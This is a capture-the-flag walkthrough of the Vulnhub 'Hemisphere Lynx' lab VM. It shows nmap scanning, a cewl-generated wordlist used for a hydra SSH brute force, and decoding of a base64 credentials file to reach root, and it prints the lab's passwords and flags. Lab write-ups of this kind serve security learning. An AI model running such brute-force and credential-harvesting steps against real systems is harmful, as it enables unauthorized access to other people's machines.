Vulnhub - Hemisphere Lynx

Box Stats

Box Info Details
Box Name : Hemisphere Lynx
Series : Hemisphere
Difficulty : Easy
Release Date : 1 Oct 2020
OS : GNU/Linux
Maker : d4t4s3c
Download : Hemisphere Lynx

Summary

This was a really easy box, pretty basic stuff perfect to pass your time. We generate a custom wordlist with cewl and we run a brute force attack on ssh this way we get the user flag. Root is simply a base64 decoding. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ ip=192.168.1.101                                                                                                                                                               130 ↵
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 20:32 EET
Nmap scan report for lynx.zte.com.cn (192.168.1.101)
Host is up (0.00041s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:8F:D2:91 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds
$ nmap -p 21,22,80,139,445 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 20:32 EET
Nmap scan report for lynx.zte.com.cn (192.168.1.101)
Host is up (0.00047s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 26:21:06:43:f3:27:b0:2f:df:eb:37:c0:26:d7:58:2a (RSA)
|   256 cd:a2:e4:63:31:78:79:a1:56:1d:1d:bd:85:ee:6b:fb (ECDSA)
|_  256 dd:bc:7e:1d:a3:ad:ff:aa:1a:3f:d3:68:a4:42:ea:1b (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title:  Lynx 
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)

Let’s start the enumeration with port 80, i don’t understand the language of the text but the box desc says “Brute Forze” so we can simply generate a custom wordlist with cewl and run a brute force on SSH.

Shell as johannes

1
$ cewl http://$ip/ | tee wordlist.txt
1
2
3
4
5
6
$ hydra -L wordlist.txt -P wordlist.txt $ip ssh

[DATA] max 16 tasks per 1 server, overall 16 tasks, 2601 login tries (l:51/p:51), ~163 tries per task
[DATA] attacking ssh://192.168.1.101:22/
[STATUS] 312.00 tries/min, 312 tries in 00:01h, 2291 to do in 00:08h, 16 active
[22][ssh] host: 192.168.1.101   login: johannes   password: constelaciones
1
2
3
4
5
6
$ ssh johannes@$ip                                                                                                                                                               255 ↵
johannes@192.168.1.101's password: 

johannes@Lynx:~$ whoami;id
johannes
uid=1000(johannes) gid=1000(johannes) grupos=1000(johannes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Shell as root

Under /Desktop we can see a hidden creds file:

1
2
3
4
5
johannes@Lynx:~/Desktop$ ls -la
total 12
drwxr-xr-x  2 root     root     4096 oct  1 13:39 .
drwxr-xr-x 10 johannes johannes 4096 oct  1 21:46 ..
-rw-r--r--  1 root     root       37 oct  1 13:39 .creds

It contains a base64 string, let’s decode it:

1
2
3
4
johannes@Lynx:~/Desktop$ cat .creds 
MjBLbDdpUzFLQ2FuaU84RFdNemg6dG9vcg==
johannes@Lynx:~/Desktop$ cat .creds | base64 -d
20Kl7iS1KCaniO8DWMzh:toor

Seems like reversed, let’s reverse it.

1
2
johannes@Lynx:~/Desktop$ cat .creds | base64 -d | rev
root:hzMWD8OinaCK1Si7lK02

Now we can simply switch to user root:

1
2
3
4
5
johannes@Lynx:~/Desktop$ su - root
Contraseña: 
root@Lynx:~# whoami;id
root
uid=0(root) gid=0(root) grupos=0(root)

Reading the flag(s)

1
2
3
4
root@Lynx:~# cat /root/root.txt 
4xKWoV6QGHTetItzD7mI
root@Lynx:~# cat /home/johannes/user.txt 
uZ8iARX2aiDV1bNz7Dx4

Thank You

Thank you for taking the time to read my writeup. If you don’t understand something from the writeup or want to ask me something feel free to contact me through discord(0xatom#8707) or send me a message through twitter 0xatom :blush:

Until next time keep pwning hard! :fire: